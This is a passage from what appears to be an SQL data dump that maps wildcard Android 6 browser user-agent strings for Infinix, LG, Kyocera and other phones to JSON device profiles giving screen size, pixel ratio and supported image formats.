Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix S2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix X510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix Zero 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix Zero 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix-X521) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix-X552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix_X521) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix_X521S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Innos_D6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ixion E345) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ixion ES355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ixion ES550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ixion M240) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ixion X150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; J5 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; J7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; J7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; JAZZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; JDN-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; JERRY MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; JERRY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; JOY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K-KOOL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K10000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K4000 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K6000 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K9 Smart 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; K90) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KING) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KIW-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KIW-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KIW-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KIW-L24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KIW-TL00H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KIW-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KODAK SMARTWAY X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KYOCERA-E6820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KYV35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; KYV38) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Kosumi) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Kylin 5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Kylin 5.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; L-EMENT 553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; L-EMENT_403) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; L-ITE 552 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; L451E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; L50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; L500C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; L551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LAVA_R1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEAGOO M8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEAGOO Z5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LENNY3 MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LENNY3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEX620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEX622) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEX626) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEX650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEX651) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEX653) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEX657) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEX720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEX722) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LEX727) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-AS110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-D802) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-D851) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-D852) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-D852G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-D855) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-D855/V30o) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-D856) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-D858HK) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F460S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F500K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F500L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F500S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F600L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F650K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F700K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 